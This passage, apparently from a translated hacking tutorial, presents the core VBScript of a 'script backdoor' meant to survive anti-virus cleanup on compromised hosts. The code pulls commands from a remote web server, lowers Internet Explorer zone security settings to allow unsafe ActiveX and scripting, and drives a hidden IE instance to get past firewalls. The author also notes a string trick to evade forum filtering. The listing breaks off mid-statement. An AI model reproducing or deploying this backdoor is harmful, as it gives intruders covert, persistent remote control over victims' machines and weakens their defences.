Despite all these difficulties, the script backdoor is still worth the challenge. When all the Trojans on your compromised hosts have been cleaned out by anti-virus software, the script backdoor that runs 24 hours a day may be your last hope. Below is the core code of a simple script backdoor (without the installation part):

CODZ:

cmdu = "http://myweb.8866.org/cmd.txt"                        ' URL from which the commands are fetched from the web server
cmdw = 4000                                                   ' download timeout, 4 seconds
cmdl = "HKLM\Software\Microsoft\WBEM\CIMOM\CmdLength"         ' name of the registry value that records the length of the last command
On Error Resume Next                                          ' ignore non-fatal errors (comment out while debugging)
Set shl = CreateObject("WScript.Shell")                       ' the WScript root object is unavailable under scrcons.exe, but its child objects can still be created
Set aso = CreateObject("ADODB.Stream")
Set ie = CreateObject("InternetExplorer.Application")         ' use IE to get through the firewall
zone = "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"   ' zone 3 is the Internet zone
set1 = zone & "\1201"                                         ' 1201: ActiveX controls not marked safe for scripting
set2 = zone & "\1400"                                         ' 1400: active scripting
set3 = zone & "\CurrentLevel"
val1 = shl.RegRead(set1)                                      ' save the original security settings
val2 = shl.RegRead(set2)
val3 = shl.RegRead(set3)
regd = "REG_DWORD"
shl.RegWrite set1, 0, regd                                    ' allow unsafe ActiveX objects
shl.RegWrite set2, 0, regd                                    ' allow active scripting
shl.RegWrite set3, 0, regd                                    ' set the Internet zone security level to "custom"
ie.Visible = 0                                                ' use ie.Visible = 1 while debugging
ie.Navigate "about" & ":blank"                                ' the string concatenation is purely to get past forum filtering
ie.document.write _
' (the listing breaks off here in this copy)